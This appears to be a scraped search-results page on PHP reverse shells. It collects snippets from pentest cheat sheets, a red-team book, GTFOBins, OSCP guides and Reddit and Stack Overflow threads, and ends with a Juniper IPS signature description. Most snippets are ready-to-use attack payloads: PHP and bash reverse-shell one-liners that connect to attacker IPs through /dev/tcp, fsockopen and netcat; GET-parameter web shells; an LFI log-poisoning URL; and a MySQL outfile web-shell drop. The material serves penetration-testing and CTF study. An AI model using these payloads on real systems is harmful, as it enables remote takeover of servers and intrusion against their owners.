php shell_exec reverse shell

August 13, 2019 - A tiny PHP/bash reverse shell. ... This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters ... This shell was writing duplicate input when using a netcat listener. removing the ampersand (&) solved my problem. <?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");

O'Reilly

oreilly.com › library › view › hands-on-red-team › 9781788995238 › 971689ca-b096-4067-b99c-d15078636523.xhtml

Php reverse shell - Hands-On Red Team Tactics [Book]

September 28, 2018 - php -r '$s=fsockopen("192.168.2.6",8080);exec("/bin/sh -i <&3 >&3 2>&3");' Using the shell_exec() function: php -r '$s=fsockopen("192.168.2.6",8080);shell_exec("/bin/sh -i <&3 >&3 2>&3");' Using the system() function: php -r '$s=fsockopen("192.168.2.6",8080);system("/bin/sh -i <&3 >&3 2>&3");' Using the popen() function: php -r '$s=fsockopen("192.168.2.6",8080);popen("/bin/sh -i <&3 >&3 2>&3","r");' Using just /bin/sh: php -r '$s=fsockopen("192.168.2.6",8080);`/bin/sh -i <&3 >&3 2>&3`;' Read now ·

Authors Himanshu SharmaHarpreet Singh

Published 2018

Pages 480

Discussions

windows php reverse shell

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php This is like the best reverse shell for any OS. https://www.revshells.com/ Also this site is very useful More on reddit.com

r/oscp

12

15

January 11, 2023

Executing a PHP script (a reverse shell) by calling it through the URL

You can run Windows commands on the target by navigating to /usr/local/apache/logs/access.log? That doesn't seem right. Is it a Linux box? If you uploaded the webshell, you can navigate to it and use a query string to run commands, http://192.168.1.8/files/shell.php?revsh=ifconfig More on reddit.com

r/AskNetsec

6

5

April 16, 2018

Reverse shell PHP with GET parameters - Stack Overflow

I'm not sure if this helps... But do you get the same problem if you remove the quotes? I.e. shell.php?cmd=ls -lh More on stackoverflow.com

stackoverflow.com

reverse shell php

For number 2 you mixed a command line reverse shell that gets executed by php (that’s what the „php -r“ stands for) with php script tags that get executed automatically. If you do just &3 2>&3"); ?> without php -r and without quotes it has a better chance to work More on reddit.com

r/tryhackme

10

1

September 13, 2023

Gtfobins

gtfobins.org › gtfobins › php

php | GTFOBins

This executable can run non-interactive system commands. ... This function can be performed by any unprivileged user. php -r 'echo shell_exec("/path/to/command");' Sudo

High on Coffee

highon.coffee › blog › reverse-shell-cheat-sheet

Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python

A short one line reverse PHP shell (that was submitted via Twitter): <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

PHP

php.net › manual › en › function.shell-exec.php

PHP: shell_exec - Manual

I wanted to run Ghostscript via ImageMagik's "convert" and ended up having to add my path before running the command: <?php $cmd = 'export PATH="/usr/local/bin/"; convert -scale 25%x25% file1.pdf[0] file2.png 2>&1'; echo "<pre>".shell_exec($cmd)."</pre>"; ?> ALSO, note that shell_exec() does not grab STDERR, so use "2>&1" to redirect it to STDOUT and catch it. ... Just a quick reminder for those trying to use shell_exec on a unix-type platform and can't seem to get it to work.

Offsecnewbie

guide.offsecnewbie.com › shells

Shells - Rowbot's PenTest Notes - OffSecNewbie.com

<?php echo 'running shell'; $ip='YOUR_IP'; $port='YOUR_PORT'; $reverse_shells = array( '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1', '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196', '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash', 'nc.exe -nv '.$ip.'

Navisec

navisec.io › reverse-shell-reference

Reverse Shell Reference Sheet | Free Pentesting Guide

3 days ago - Bash. Python. PHP. PowerShell. Netcat. Ruby. NodeJS. Shell upgrades. One clean PDF — built by NaviSec practitioners from real engagements. Free download. A PDF covering every major reverse shell technique — formatted for quick reference during live engagements, CTFs, or labs.

reddit.com › r/oscp › windows php reverse shell

r/oscp on Reddit: windows php reverse shell

January 11, 2023 -

I am looking for the shortest possible php reverse shell that could be uploaded and run on a windows system to send cmd.exe to a nc listener.

Top answer

1 of 5

17

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php This is like the best reverse shell for any OS. https://www.revshells.com/ Also this site is very useful

2 of 5

8

" . shell_exec($_REQUEST['cmd']) . ""; ?> Then send whatever reverse shell will work on the host as an HTTP parameter. eg. http://10.10.10.10/myshell.php?cmd=powershell+-enc+AAAAAAAAA ... You can make this smaller still with no output but it's handy to send cmd=whoami to confirm it's working and get output on your page. I don't hard-code the reverse shell command line into php since it's much nicer to confirm execution, then go one step at a time to get your reverse shell working IMO. The steps I normally go through are to ping my machine while listening for ICMP in tcpdump, then I will test-netconnection with a -port, or upload nc.exe to make sure I can get back to my local machine on a specific port, then I'll work up slowly to a full reverse shell with powershell or a custom msfvenom exe etc.

Pentestmonkey

pentestmonkey.net › tools › web-shells › php-reverse-shell

php-reverse-shell | pentestmonkey

It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell.

Find elsewhere

Google Bing Mojeek

GitHub

gist.github.com › jimmy-ly00 › fb587bc102d66f1e41d84c4b4ea76fa3

One liner actual PHP code reverse shell · GitHub

One liner actual PHP code reverse shell. GitHub Gist: instantly share code, notes, and snippets.

reddit.com › r/asknetsec › executing a php script (a reverse shell) by calling it through the url

r/AskNetsec on Reddit: Executing a PHP script (a reverse shell) by calling it through the URL

April 16, 2018 -

I'm stuck trying to get a reverse shell to execute by calling it through a URL.

I have a vulnerable Windows machine, and I've uploaded a PHP reverse shell to it. I've also contaminated the Apache logs with:

<?php echo shell_exec($_GET['revsh']);?>

So the PHP code, and the PHP reverse script are on the machine.

I can run Windows commands via the URL by running: http://192.168.1.8/musiclist.php?name=frank&message=test123&revsh=ipconfig&volume=../../../../../../../usr/local/apache/logs/access.log%00

The above displays the access logs with the output of ipconfig embedded.

My PHP reverse works too. Since it's a test machine, I can navigate to it and click on it. When I do that my nc listener in kali gets a Windows shell. So the shell isn't the problem I don't think.

What I'm struggling with is executing the PHP script from the above URL. I would think I'd just have to replace 'ipconfig' with the path of the PHP script, or something similar. Some of the things I've tried include: revsh="http://192.168.1.8/files/shell.php" (that's where the shell is located) revsh="php-cli http://192.168.1.8/files/shell.php" revsh=../../../../../../files/shell.php

...and other variations.

Perhaps I'm not calling it correctly? Do I need to call a function in the PHP vs. the file itself? Am I not calling the file correctly?

Top answer

1 of 3

1

You can run Windows commands on the target by navigating to /usr/local/apache/logs/access.log? That doesn't seem right. Is it a Linux box? If you uploaded the webshell, you can navigate to it and use a query string to run commands, http://192.168.1.8/files/shell.php?revsh=ifconfig

2 of 3

1

Did you try passing in the php reverse shell file instead of the access.log into the volume parameter that is vulnerable to LFI? If that doesn’t work, you can use your current approach and try to pass in a php or powershell reverse shell one liner into your revsh parameter.

Acunetix

acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2

Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix

March 5, 2025 - Executing the ls command on a Linux machine achieves a similar result. <?php // Return the listing of the directory where the file runs (Linux) system("ls -la"); ?> --> total 12 drwxrwxr-x 2 secuser secuser 4096 Feb 27 20:43 . drwxr-xr-x 6 secuser secuser 4096 Feb 27 20:40 .. -rw-rw-r-- 1 secuser secuser 26 Feb 27 20:41 shell.php

pentestmonkey

pentestmonkey.net › cheat-sheet › shells › reverse-shell-cheat-sheet

Reverse Shell Cheat Sheet | pentestmonkey

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Stack Overflow

stackoverflow.com › questions › 68678897 › reverse-shell-php-with-get-parameters

Reverse shell PHP with GET parameters - Stack Overflow

I'm using a simple reverse shell php script: $res = shell_exec($_GET['cmd'])); var_dump($res); However command using spaces does not work: shell.php?cmd="ls" works shell.php?cmd="ls -lh" not working shell.php?cmd="ls -lh" not working · I checked ...

Zeeshan Sahi's blog

zsahi.wordpress.com › reverse-shell

Reverse Shell - Zeeshan Sahi's blog - WordPress.com

September 10, 2018 - nc -lvp 1234 < php_reverse_shell.php cmd=nc 192.168.8.102 123 > reverse-shell.php -w 1 -q 1 /browse.php?file=/tmp/shell2.php&cmd=nc+-w+1+10.10.14.4+5555+>+/tmp/shell5.php ... Like Loading... Windows Non-Interactive Command Execution to Interactive Netcat Reverse Shell

GitBooks

sushant747.gitbooks.io › total-oscp-guide › content › webshell.html

Webshell · Total OSCP Guide - sushant747

shell.php?cmd=whoami <?php system($_GET['cmd']); ?> # The same but using passthru <?php passthru($_GET['cmd']); ?> # For shell_exec to output the result you need to echo it <?php echo shell_exec("whoami");?> # Exec() does not output the result without echo, and only output the last line.

reddit.com › r/tryhackme › reverse shell php

r/tryhackme on Reddit: reverse shell php

September 13, 2023 -

Hi everyone,

I'm wondering about a subject.

Sometimes i have to upload a reverse-shell php. I know somes techniques :

1- Push a <?php system($_GET["cmd"]); ?> and then use whoami . It works, but bash -i >& /dev/tcp/KALI_IP/4444 0>&1 or rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 4444 >/tmp/f encoded in URL doesn't. I don't understand why

2- I also found <?php php -r '$sock=fsockopen("KALI_IP",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' ?> but i can't say when to use it

3- and the classic https://github.com/Wh1ter0sEo4/reverse_shell_php/blob/main/reverse_shell.php

Someone can help me to understand, when to use each one ?

EDIT :

1- It works (URL encoded) with /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' and the other one works without changement

2- <?php $sock = fsockopen("KALI_IP", 4444); proc_open('/bin/bash -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes>

I also found an amazing tool : https://github.com/WhiteWinterWolf/wwwolf-php-webshell . I will keep it carefully

Top answer

1 of 4

3

For number 2 you mixed a command line reverse shell that gets executed by php (that’s what the „php -r“ stands for) with php script tags that get executed automatically. If you do just &3 2>&3"); ?> without php -r and without quotes it has a better chance to work

2 of 4

2

https://www.revshells.com This is a great site to bookmark. Go through the options once you have some information on the OS in question and language you can run etc and you’ll get the code needed for gaining a reverse shell.

reddit.com › r/asknetsec › php reverse shell without fsockopen() and exec()

r/AskNetsec on Reddit: PHP reverse shell without fsockopen() and exec()

January 9, 2019 -

Hi, I am studying for OSCP and I found Remote File Inclusion vulnerability, but the target host has disabled fsockopen() and exec() functions. Is there any other way how to do reverse shell? Thanks!

Top answer

1 of 1

4

Maybe you could try something other that reverse shell. Like listing directories, reading that webapp's source code, reading configs, user files, etc. You could also try using exec alternatives such as system(), passthru(), shell_exec(), popen(),.. if you are dead set on executing from php.

Ed4m4s

ed4m4s.blog › reverse-shells

Reverse Shells | Hack$Notes

Try with 4, 5, 6… php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' The below can be used too: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/MY_IP_ADDRESS/MY_PORT 0>&1'"); ?> Or simple create a PHP page with the following: <?php system($_GET['cmd']); ?> Have MySQL access? Add the following: SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php" windows-php-reverse-shell/Reverse Shell.php at master ·

Juniper Networks

juniper.net › threat labs › ips signatures

SHELLCODE:PHP:REVERSE-SHELL

This signature detects a "PHP Reverse Shell" shellcode, which when executed, creates an operating system shell and binds it to a TCP socket that connects back to the attacker.